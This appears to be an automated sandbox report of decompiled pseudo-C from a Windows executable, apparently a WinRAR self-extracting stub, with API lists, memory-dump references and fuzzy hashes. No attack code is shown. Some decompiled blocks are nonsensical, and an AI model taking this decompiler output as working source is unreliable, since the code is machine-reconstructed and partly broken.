          													_push(__ebp - 0x14);
          													__eax = __ebp - 0x103c;
          													_push(__ebp - 0x103c);
          													__eax = __ebp - 0x1c;
          													_push(__ebp - 0x1c);
          													_push(0);
          													_push(L"ProgramFilesDir");
          													_push( *(__ebp - 0x18));
          													__eax =  *0x22dea4();
          													_push( *(__ebp - 0x18));
          													 *0x22de84() =  *(__ebp - 0x14);
          													__ecx = 0x7ff;
          													__eax =  *(__ebp - 0x14) >> 1;
          													__eflags = __eax - 0x7ff;
          													if(__eax >= 0x7ff) {
          														__eax = 0x7ff;
          													}
          													__ecx = 0;
          													__eflags = 0;
          													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
          												}
          												__eflags =  *(__ebp - 0x103c) - __bx;
          												if( *(__ebp - 0x103c) != __bx) {
          													__eax = __ebp - 0x103c;
          													__eax = E00212B33(__ebp - 0x103c);
          													_push(0x5c);
          													_pop(__ecx);
          													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
          													if(__eflags != 0) {
          														__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, "\\", __esi);
          													}
          												}
          												__esi = E00212B33(__edi);
          												__eax = __ebp - 0x103c;
          												__eflags = __esi - 0x7ff;
          												__esi = 0x800;
          												if(__eflags < 0) {
          													__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
          												}
          												goto L65;
          											}
          											L54:
          											__eflags =  *((short*)(__edi + 2)) - 0x3a;
          											if( *((short*)(__edi + 2)) == 0x3a) {
          												goto L64;
          											}
          											goto L55;
          										}
          										L49:
          										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
          										if( *((intOrPtr*)(__edi + 2)) != __cx) {
          											goto L52;
          										}
          										L50:
          										__edi = __edi + 4;
          										__ebx = 0;
          										__eflags =  *__edi - __bx;
          										if( *__edi == __bx) {
          											goto L164;
          										}
          										L51:
          										__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, 0x800);
          										goto L65;
          									}
          								case 4:
          									L70:
          									__eflags =  *0x2395fc - 1;
          									__eflags = __eax - 0x2395fc;
          									 *__edi =  *__edi + __ecx;
          									__eflags =  *(__ebx + 6) & __bl;
          									 *__eax =  *__eax + __al;
          									__eflags =  *__eax;
          								case 5:
          									L75:
          									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          									__ecx = 0;
          									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          									__eflags = __eax;
          									if(__eax == 0) {
          										L82:
          										 *0x2375d2 = __cl;
          										 *0x2375d3 = 1;
          										goto L164;
          									}
          									L76:
          									__eax = __eax - 0x30;
          									__eflags = __eax;
          									if(__eax == 0) {
          										L80:
          										 *0x2375d2 = __cl;
          										L81:
          										 *0x2375d3 = __cl;
          										goto L164;
          									}
          									L77:
          									__eax = __eax - 1;
          									__eflags = __eax;
          									if(__eax == 0) {
          										goto L82;
          									}
          									L78:
          									__eax = __eax - 1;
          									__eflags = __eax;
          									if(__eax != 0) {
          										goto L164;
          									}
          									L79:
          									 *0x2375d2 = 1;
          									goto L81;
          								case 6:
          									L88:
          									__eflags = __ebx - 4;
          									if(__ebx != 4) {
          										goto L92;
          									}
          									L89:
          									__eax = __ebp - 0x5c84;
          									__eax = E00212B69(__ebp - 0x5c84, __eax, L"<>");
          									_pop(__ecx);
          									_pop(__ecx);
          									__eflags = __eax;
          									if(__eax == 0) {
          										goto L92;
          									}
          									L90:
          									_push(__edi);
          									goto L91;
          								case 7:
          									goto L0;
          								case 8:
          									L116:
          									__eflags = __ebx - 3;
          									if(__ebx == 3) {
          										__eflags =  *(__ebp - 0x5c84) - __di;
          										if(__eflags != 0) {
          											__eax = __ebp - 0x5c84;
          											_push(__ebp - 0x5c84);
          											__eax = E0021668C(__ebx, __edi);
          											_pop(__ecx);
          											 *0x24de1c = __eax;
          										}
          										__eax = __ebp + 0xc;
          										_push(__ebp + 0xc);
          										 *0x24de18 = E0020A2AE(__ecx, __edx, __eflags);
          									}
          									 *0x245d03 = 1;
          									goto L164;
          								case 9:
          									L121:
          									__eflags = __ebx - 5;
          									if(__ebx != 5) {
          										L92:
          										 *0x24de20 = 1;
          										goto L164;
          									}
          									L122:
          									_push(1);
          									L91:
          									__eax = __ebp - 0x5c84;
          									_push(__ebp - 0x5c84);
          									_push( *(__ebp + 8));
          									__eax = E0020C431();
          									goto L92;
          								case 0xa:
          									L123:
          									__eflags = __ebx - 6;
          									if(__ebx != 6) {
          										goto L164;
          									}
          									L124:
          									__eax = 0;
          									 *(__ebp - 0x2c3c) = __ax;
          									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
          									__eax = E002159C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
          									_push(0x800);
          									__eflags = __eax - 0x50;
          									if(__eax == 0x50) {
          										_push(0x24ad0a);
          										__eax = __ebp - 0x2c3c;
          										_push(__ebp - 0x2c3c);
          										__eax = E001FFAB1();
          										 *(__ebp - 0x14) = 2;
          									} else {
          										__eflags = __eax - 0x54;
          										__eax = __ebp - 0x2c3c;
          										if(__eflags == 0) {
          											_push(0x249d0a);
          											_push(__eax);
          											__eax = E001FFAB1();
          											 *(__ebp - 0x14) = 7;
          										} else {
          											_push(0x24bd0a);
          											_push(__eax);
          											__eax = E001FFAB1();
          											 *(__ebp - 0x14) = 0x10;
          										}
          									}
          									__eax = 0;
          									 *(__ebp - 0x9c8c) = __ax;
          									 *(__ebp - 0x1c3c) = __ax;
          									__ebp - 0x19c8c = __ebp - 0x6c84;
          									__eax = E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
          									_pop(__ecx);
          									_pop(__ecx);
          									_push(0x22);
          									_pop(__ebx);
          									__eflags =  *(__ebp - 0x6c84) - __bx;
          									if( *(__ebp - 0x6c84) != __bx) {
          										L132:
          										__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
          										__eflags = __al;
          										if(__al != 0) {
          											goto L149;
          										}
          										L133:
          										__ebx = __edi;
          										__esi = __ebp - 0x6c84;
          										__eflags =  *(__ebp - 0x6c84) - __bx;
          										if( *(__ebp - 0x6c84) == __bx) {
          											goto L149;
          										}
          										L134:
          										_push(0x20);
          										_pop(__ecx);
          										do {
          											L135:
          											__eax = __esi->i & 0x0000ffff;
          											__eflags = __ax - __cx;
          											if(__ax == __cx) {
          												L137:
          												__edi = __eax;
          												__eax = 0;
          												__esi->i = __ax;
          												__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
          												__eflags = __al;
          												if(__al == 0) {
          													L144:
          													__esi->i = __di;
          													L145:
          													_push(0x20);
          													_pop(__ecx);
          													__edi = 0;
          													__eflags = 0;
          													goto L146;
          												}
          												L138:
          												_push(0x2f);
          												_pop(__eax);
          												__ebx = __esi;
          												__eflags = __di - __ax;
          												if(__di != __ax) {
          													L140:
          													_push(0x20);
          													_pop(__eax);
          													do {
          														L141:
          														__esi =  &(__esi->i);
          														__eflags = __esi->i - __ax;
          													} while (__esi->i == __ax);
          													_push(__esi);
          													__eax = __ebp - 0x1c3c;
          													L143:
          													_push(__eax);
          													__eax = E00214D7E();
          													_pop(__ecx);
          													_pop(__ecx);
          													 *__ebx = __di;
          													goto L145;
          												}
          												L139:
          												 *(__ebp - 0x1c3c) = __ax;
          												__eax =  &(__esi->i);
          												_push( &(__esi->i));
          												__eax = __ebp - 0x1c3a;
          												goto L143;
          											}
          											L136:
          											_push(0x2f);
          											_pop(__edx);
          											__eflags = __ax - __dx;
          											if(__ax != __dx) {
          												goto L146;
          											}
          											goto L137;
          											L146:
          											__esi =  &(__esi->i);
          											__eflags = __esi->i - __di;
          										} while (__esi->i != __di);
          										__eflags = __ebx;
          										if(__ebx != 0) {
          											__eax = 0;
          											__eflags = 0;
          											 *__ebx = __ax;
          										}
          										goto L149;
          									} else {
          										L130:
          										__ebp - 0x19c8a = __ebp - 0x6c84;
          										E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
          										_push(__ebx);
          										_push(__ebp - 0x6c82);
          										__eax = E00210BB8(__ecx);
          										__esp = __esp + 0x10;
          										__eflags = __eax;
          										if(__eax != 0) {
          											__ecx = 0;
          											 *__eax = __cx;
          											__ebp - 0x1c3c = E00214D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
          											_pop(__ecx);
          											_pop(__ecx);
          										}
          										L149:
          										__eflags =  *(__ebp - 0x11c8c);
          										__ebx = 0x800;
          										if( *(__ebp - 0x11c8c) != 0) {
          											_push(0x800);
          											__eax = __ebp - 0x9c8c;
          											_push(__ebp - 0x9c8c);
          											__eax = __ebp - 0x11c8c;
          											_push(__ebp - 0x11c8c);
          											__eax = E001FAED7();
          										}
          										_push(__ebx);
          										__eax = __ebp - 0xbc8c;
          										_push(__ebp - 0xbc8c);
          										__eax = __ebp - 0x6c84;
          										_push(__ebp - 0x6c84);
          										__eax = E001FAED7();
          										__eflags =  *(__ebp - 0x2c3c);
          										if(__eflags == 0) {
          											__ebp - 0x2c3c = E0020A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
          										}
          										__ebp - 0x2c3c = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
          										__eflags =  *((short*)(__ebp - 0x17c8c));
          										if(__eflags != 0) {
          											__ebp - 0x17c8c = __ebp - 0x2c3c;
          											E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
          											__eax = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
          										}
          										__ebp - 0x2c3c = __ebp - 0xcc8c;
          										__eax = E00214D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
          										__eflags =  *(__ebp - 0x13c8c);
          										__eax = __ebp - 0x13c8c;
          										_pop(__ecx);
          										_pop(__ecx);
          										if(__eflags == 0) {
          											__eax = __ebp - 0x19c8c;
          										}
          										__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
          										__eax = __ebp - 0x2c3c;
          										__eflags = E001FB153(__ebp - 0x2c3c);
          										if(__eflags == 0) {
          											L159:
          											__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
          											goto L160;
          										} else {
          											L158:
          											__eflags = __eax;
          											if(__eflags == 0) {
          												L160:
          												_push(1);
          												__eax = __ebp - 0x2c3c;
          												_push(__ebp - 0x2c3c);
          												E001F9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
          												__ebp - 0xac8c = E00214D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
          												_pop(__ecx);
          												_pop(__ecx);
          												__ebp - 0xac8c = E001FB98D(__eflags, __ebp - 0xac8c);
          												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
          												__eax = __ebp - 0x1c3c;
          												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
          												__edx = __ebp - 0x9c8c;
          												__esi = __ebp - 0xac8c;
          												asm("sbb ecx, ecx");
          												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
          												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
          												asm("sbb eax, eax");
          												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
          												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
          												__eax = __ebp - 0x15c8c;
          												asm("sbb edx, edx");
          												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
          												E00209D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
          												__ebp - 0xbc8c = E00209450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
          												__eflags =  *(__ebp - 0xcc8c);
          												if( *(__ebp - 0xcc8c) != 0) {
          													_push(__edi);
          													__eax = __ebp - 0xcc8c;
          													_push(__ebp - 0xcc8c);
          													_push(5);
          													_push(0x1000);
          													__eax =  *0x22def8();
          												}
          												goto L164;
          											}
          											goto L159;
          										}
          									}
          								case 0xb:
          									L162:
          									__eflags = __ebx - 7;
          									if(__ebx == 7) {
          										 *0x239600 = 1;
          									}
          									goto L164;
          								case 0xc:
          									L83:
          									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
          									__eax = E002159C0( *(__ebp - 0x5c84) & 0x0000ffff);
          									__eflags = __eax - 0x46;
          									if(__eax == 0x46) {
          										 *0x2375d4 = 1;
          									} else {
          										__eflags = __eax - 0x55;
          										if(__eax == 0x55) {
          											 *0x2375d5 = 1;
          										} else {
          											__eax = 0;
          											 *0x2375d4 = __al;
          											 *0x2375d5 = __al;
          										}
          									}
          									goto L164;
          								case 0xd:
          									L93:
          									 *0x24de21 = 1;
          									__eax = __eax + 0x24de21;
          									_t104 = __esi + 0x39;
          									 *_t104 =  *(__esi + 0x39) + __esp;
          									__eflags =  *_t104;
          									__ebp = 0xffffa37c;
          									if( *_t104 != 0) {
          										_t106 = __ebp - 0x5c84; // 0xffff46f8
          										__eax = _t106;
          										_push(_t106);
          										 *0x22d5fc = E002013FC();
          									}
          									goto L164;
          							}
          							L2:
          							_t210 = E00209E24(_t210, _t279);
          							_t279 = _t279 + 0x2000;
          							_t277 = _t277 - 1;
          							if(_t277 != 0) {
          								goto L2;
          							} else {
          								_t280 = _t277;
          								goto L4;
          							}
          						}
          						L165:
          						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
          						return _t209;
          					}
          					L100:
          					__eflags =  *0x245d02;
          					if( *0x245d02 != 0) {
          						goto L164;
          					}
          					L101:
          					__eax = 0;
          					 *(__ebp - 0x143c) = __ax;
          					__eax = __ebp - 0x5c84;
          					_push(__ebp - 0x5c84);
          					__eax = E00210BB8(__ecx);
          					_pop(__ecx);
          					__ecx = 0x2c;
          					__eflags = __eax;
          					if(__eax != 0) {
          						L108:
          						__eflags =  *(__ebp - 0x143c);
          						if( *(__ebp - 0x143c) == 0) {
          							__ebp - 0x1bc8c = __ebp - 0x5c84;
          							E001FFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
          							__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
          						}
          						__ebp - 0x5c84 = E00209C4F(__ebp - 0x5c84);
          						__eax = 0;
          						 *(__ebp - 0x4c84) = __ax;
          						__ebp - 0x143c = __ebp - 0x5c84;
          						__eax = E00209735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
          						__eflags = __eax - 6;
          						if(__eax == 6) {
          							goto L164;
          						} else {
          							L111:
          							__eax = 0;
          							__eflags = 0;
          							 *0x2375d7 = 1;
          							 *0x2385fa = __ax;
          							__eax = EndDialog( *(__ebp + 8), 1);
          							goto L112;
          						}
          					}
          					L102:
          					__esi = 0;
          					__eflags =  *(__ebp - 0x5c84) - __dx;
          					if( *(__ebp - 0x5c84) == __dx) {
          						goto L108;
          					}
          					L103:
          					__ecx = 0;
          					__eax = __ebp - 0x5c84;
          					while(1) {
          						L104:
          						__eflags =  *__eax - 0x40;
          						if( *__eax == 0x40) {
          							break;
          						}
          						L105:
          						__esi =  &(__esi->i);
          						__eax = __ebp - 0x5c84;
          						__ecx = __esi + __esi;
          						__eax = __ebp - 0x5c84 + __ecx;
          						__eflags =  *__eax - __dx;
          						if( *__eax != __dx) {
          							continue;
          						}
          						L106:
          						goto L108;
          					}
          					L107:
          					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
          					__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
          					__eax = 0;
          					__eflags = 0;
          					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
          					goto L108;
          					L112:
          					__eflags = _t263 - 7;
          					if(_t263 == 7) {
          						__eflags =  *0x2395fc;
          						if( *0x2395fc == 0) {
          							 *0x2395fc = 2;
          						}
          						 *0x2385f8 = 1;
          					}
          					goto L164;
          				}
          			}










          0x0020bead
          0x0020bead
          0x0020beb0
          0x0020beb0
          0x0020beb5
          0x0020beb6
          0x0020bebc
          0x0020bebc
          0x0020bebd
          0x0020bec2
          0x0020bec3
          0x0020bec4
          0x00000000
          0x0020bec4
          0x0020be97
          0x0020be97
          0x0020be9e
          0x0020bea1
          0x0020bea2
          0x00000000
          0x0020bea2
          0x0020be6e
          0x0020be6e
          0x0020be70
          0x0020be71
          0x0020be74
          0x00000000
          0x00000000
          0x00000000
          0x0020bed1
          0x0020bed1
          0x0020bed4
          0x0020bed4
          0x0020bed9
          0x0020bedb
          0x0020bedd
          0x0020bedd
          0x0020bedf
          0x0020bedf
          0x00000000
          0x0020bdf7
          0x0020bdf7
          0x0020bdfe
          0x0020be0a
          0x0020be10
          0x0020be11
          0x0020be12
          0x0020be17
          0x0020be1a
          0x0020be1c
          0x0020be22
          0x0020be24
          0x0020be32
          0x0020be37
          0x0020be38
          0x0020be38
          0x0020bee2
          0x0020bee2
          0x0020beea
          0x0020beef
          0x0020bef1
          0x0020bef2
          0x0020bef8
          0x0020bef9
          0x0020beff
          0x0020bf00
          0x0020bf00
          0x0020bf05
          0x0020bf06
          0x0020bf0c
          0x0020bf0d
          0x0020bf13
          0x0020bf14
          0x0020bf19
          0x0020bf21
          0x0020bf2d
          0x0020bf2d
          0x0020bf3a
          0x0020bf3f
          0x0020bf47
          0x0020bf51
          0x0020bf5e
          0x0020bf65
          0x0020bf65
          0x0020bf71
          0x0020bf78
          0x0020bf7d
          0x0020bf85
          0x0020bf8b
          0x0020bf8c
          0x0020bf8d
          0x0020bf8f
          0x0020bf8f
          0x0020bfa4
          0x0020bfa9
          0x0020bfb5
          0x0020bfb7
          0x0020bfc8
          0x0020bfd5
          0x00000000
          0x0020bfb9
          0x0020bfb9
          0x0020bfc4
          0x0020bfc6
          0x0020bfda
          0x0020bfda
          0x0020bfdc
          0x0020bfe2
          0x0020bfe8
          0x0020bff6
          0x0020bffb
          0x0020bffc
          0x0020c004
          0x0020c009
          0x0020c010
          0x0020c016
          0x0020c018
          0x0020c01e
          0x0020c024
          0x0020c026
          0x0020c02f
          0x0020c032
          0x0020c034
          0x0020c03d
          0x0020c040
          0x0020c046
          0x0020c049
          0x0020c052
          0x0020c061
          0x0020c066
          0x0020c06e
          0x0020c070
          0x0020c071
          0x0020c077
          0x0020c078
          0x0020c07a
          0x0020c07f
          0x0020c07f
          0x00000000
          0x0020c06e
          0x00000000
          0x0020bfc6
          0x0020bfb7
          0x00000000
          0x0020c087
          0x0020c087
          0x0020c08a
          0x0020c08c
          0x0020c08c
          0x00000000
          0x00000000
          0x0020bab8
          0x0020bab8
          0x0020bac0
          0x0020bac6
          0x0020bac9
          0x0020baed
          0x0020bacb
          0x0020bacb
          0x0020bace
          0x0020bae1
          0x0020bad0
          0x0020bad0
          0x0020bad2
          0x0020bad7
          0x0020bad7
          0x0020bace
          0x00000000
          0x00000000
          0x0020bb31
          0x0020bb31
          0x0020bb32
          0x0020bb37
          0x0020bb37
          0x0020bb37
          0x0020bb3a
          0x0020bb3f
          0x0020bb45
          0x0020bb45
          0x0020bb4b
          0x0020bb51
          0x0020bb51
          0x00000000
          0x00000000
          0x0020b52a
          0x0020b52c
          0x0020b531
          0x0020b537
          0x0020b53a
          0x00000000
          0x0020b53c
          0x0020b53c
          0x00000000
          0x0020b53c
          0x0020b53a
          0x0020c0c4
          0x0020c0ca
          0x0020c0d4
          0x0020c0d4
          0x0020bbd9
          0x0020bbd9
          0x0020bbe0
          0x00000000
          0x00000000
          0x0020bbe6
          0x0020bbe6
          0x0020bbe8
          0x0020bbef
          0x0020bbf7
          0x0020bbf8
          0x0020bbfd
          0x0020bbfe
          0x0020bbff
          0x0020bc01
          0x0020bc55
          0x0020bc55
          0x0020bc5d
          0x0020bc6b
          0x0020bc7c
          0x0020bc8a
          0x0020bc8a
          0x0020bc96
          0x0020bc9b
          0x0020bc9d
          0x0020bcad
          0x0020bcb7
          0x0020bcbc
          0x0020bcbf
          0x00000000
          0x0020bcc5
          0x0020bcc5
          0x0020bcca
          0x0020bcca
          0x0020bccc
          0x0020bcd3
          0x0020bcd9
          0x00000000
          0x0020bcd9
          0x0020bcbf
          0x0020bc03
          0x0020bc05
          0x0020bc07
          0x0020bc0e
          0x00000000
          0x00000000
          0x0020bc10
          0x0020bc10
          0x0020bc12
          0x0020bc18
          0x0020bc18
          0x0020bc18
          0x0020bc1c
          0x00000000
          0x00000000
          0x0020bc1e
          0x0020bc1e
          0x0020bc1f
          0x0020bc25
          0x0020bc28
          0x0020bc2a
          0x0020bc2d
          0x00000000
          0x00000000
          0x0020bc2f
          0x00000000
          0x0020bc2f
          0x0020bc31
          0x0020bc3c
          0x0020bc46
          0x0020bc4b
          0x0020bc4b
          0x0020bc4d
          0x00000000
          0x0020bcdf
          0x0020bcdf
          0x0020bce2
          0x0020bce8
          0x0020bcef
          0x0020bcf1
          0x0020bcf1
          0x0020bcfb
          0x0020bcfb
          0x00000000
          0x0020bce2

          APIs
          • GetTempPathW.KERNEL32(00000800,?), ref: 0020BB71
          • _swprintf.LIBCMT ref: 0020BBA5
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • SetDlgItemTextW.USER32(?,00000066,002385FA), ref: 0020BBC5
          • _wcschr.LIBVCRUNTIME ref: 0020BBF8
          • EndDialog.USER32(?,00000001), ref: 0020BCD9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
          • String ID: %s%s%u
          • API String ID: 2892007947-1360425832
          • Opcode ID: 05fd29f46a2fabc6a48703a7d552ef10fd3ab7d0412adf1675bc48d71563174b
          • Instruction ID: 4acdb229ef30740fbcff7de695ead3d3f2893cef882ee7dbfd8d2d99d2daecb6
          • Opcode Fuzzy Hash: 05fd29f46a2fabc6a48703a7d552ef10fd3ab7d0412adf1675bc48d71563174b
          • Instruction Fuzzy Hash: F6414E7191031AAEEF26DF60DC85FEE77B8EB14304F5044A6F509E6092EF709A948F51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 82%
          			E002088BF(void* __edx) {
          				void* __ecx;
          				void* _t20;
          				short* _t24;
          				void* _t28;
          				signed int _t29;
          				intOrPtr _t31;
          				intOrPtr* _t38;
          				void* _t44;
          				void* _t58;
          				intOrPtr* _t60;
          				short* _t62;
          				short* _t64;
          				intOrPtr* _t67;
          				long _t69;
          				void* _t71;
          				void* _t72;
          
          				_t58 = __edx;
          				_t43 = _t44;
          				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
          					return _t20;
          				}
          				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
          				_t60 =  *((intOrPtr*)(_t71 + 0x18));
          				 *((char*)(_t71 + 0x1c)) = E002087A5(_t60);
          				_push(0x200 + E00212B33(_t60) * 2);
          				_t24 = E00212B53(_t44);
          				_t64 = _t24;
          				if(_t64 == 0) {
          					L16:
          					return _t24;
          				}
          				E00214D7E(_t64, L"<html>");
          				E002166ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
          				E002166ED(_t64, L"utf-8\"></head>");
          				_t72 = _t71 + 0x18;
          				_t67 = _t60;
          				_t28 = 0x20;
          				if( *_t60 != _t28) {
          					L4:
          					_t29 = E00201432(_t76, _t67, L"<html>", 6);
          					asm("sbb al, al");
          					_t31 =  ~_t29 + 1;
          					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
          					if(_t31 != 0) {
          						_t60 = _t67 + 0xc;
          					}
          					E002166ED(_t64, _t60);
          					if( *((char*)(_t72 + 0x1c)) == 0) {
          						E002166ED(_t64, L"</html>");
          					}
          					_t79 =  *((char*)(_t72 + 0x1c));
          					if( *((char*)(_t72 + 0x1c)) == 0) {
          						_push(_t64);
          						_t64 = E00208ACA(_t58, _t79);
          					}
          					_t69 = 9 + E00212B33(_t64) * 6;
          					_t62 = GlobalAlloc(0x40, _t69);
          					if(_t62 != 0) {
          						_t13 = _t62 + 3; // 0x3
          						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
          							 *_t62 = 0;
          						} else {
          							 *_t62 = 0xbbef;
          							 *((char*)(_t62 + 2)) = 0xbf;
          						}
          					}
          					L00212B4E(_t64);
          					_t24 =  *0x22dff8(_t62, 1, _t72 + 0x10);
          					if(_t24 >= 0) {
          						E002087DC( *((intOrPtr*)(_t43 + 0x10)));
          						_t38 =  *((intOrPtr*)(_t72 + 0xc));
          						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
          					}
          					goto L16;
          				} else {
          					goto L3;
          				}
          				do {
          					L3:
          					_t67 = _t67 + 2;
          					_t76 =  *_t67 - _t28;
          				} while ( *_t67 == _t28);
          				goto L4;
          			}




















          APIs
          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002087A0), ref: 00208994
          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002089B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AllocByteCharGlobalMultiWide
          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
          • API String ID: 3286310052-4209811716
          • Opcode ID: 67c9353fb8e62a31dd83bc157243e25569a542e64a519d7a1aba925bcaa9bf2b
          • Instruction ID: 0c46bf79d068f83c9a5b82517749b138b3828fb35d53c22501ab6656709a994c
          • Opcode Fuzzy Hash: 67c9353fb8e62a31dd83bc157243e25569a542e64a519d7a1aba925bcaa9bf2b
          • Instruction Fuzzy Hash: E1312332128316BEE314AFA0AC06FAFB79CDF51320F10450AF450962D3EF7499658BA6
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 43%
          			E00208FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
          				struct tagRECT _v16;
          				intOrPtr _v28;
          				intOrPtr _v36;
          				void* __ebx;
          				void* __edi;
          				intOrPtr _t32;
          				struct HWND__* _t43;
          				intOrPtr* _t51;
          				void* _t58;
          				WCHAR* _t65;
          				struct HWND__* _t66;
          
          				_t66 = _a8;
          				_t51 = __ecx;
          				 *(__ecx + 8) = _t66;
          				 *((char*)(__ecx + 0x26)) = _a20;
          				ShowWindow(_t66, 0);
          				E00208D3F(_t51, _a4);
          				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
          					L00212B4E( *((intOrPtr*)(_t51 + 0x1c)));
          				}
          				if(_a12 != 0) {
          					_push(_a12);
          					_t32 = E0021668C(_t51, _t58);
          				} else {
          					_t32 = 0;
          				}
          				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
          				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
          				GetWindowRect(_t66,  &_v16);
          				 *0x22df88(0,  *0x22dfd4(_t66,  &_v16, 2));
          				if( *(_t51 + 4) != 0) {
          					 *0x22df90( *(_t51 + 4));
          				}
          				_t39 = _v36;
          				_t19 = _t39 + 1; // 0x1
          				_t43 =  *0x22df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x22dfd4(_t66, 0,  *_t51, _t51, _t58));
          				 *(_t51 + 4) = _t43;
          				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
          					__eflags = _t43;
          					if(_t43 != 0) {
          						ShowWindow(_t43, 5);
          						return  *0x22df8c( *(_t51 + 4));
          					}
          				} else {
          					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
          						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
          						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
          							_t43 = E00208E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
          							_t65 = _t43;
          							if(_t65 != 0) {
          								ShowWindow(_t66, 5);
          								SetWindowTextW(_t66, _t65);
          								return L00212B4E(_t65);
          							}
          						}
          					}
          				}
          				return _t43;
          			}















          APIs
          • ShowWindow.USER32(?,00000000), ref: 00208FFF
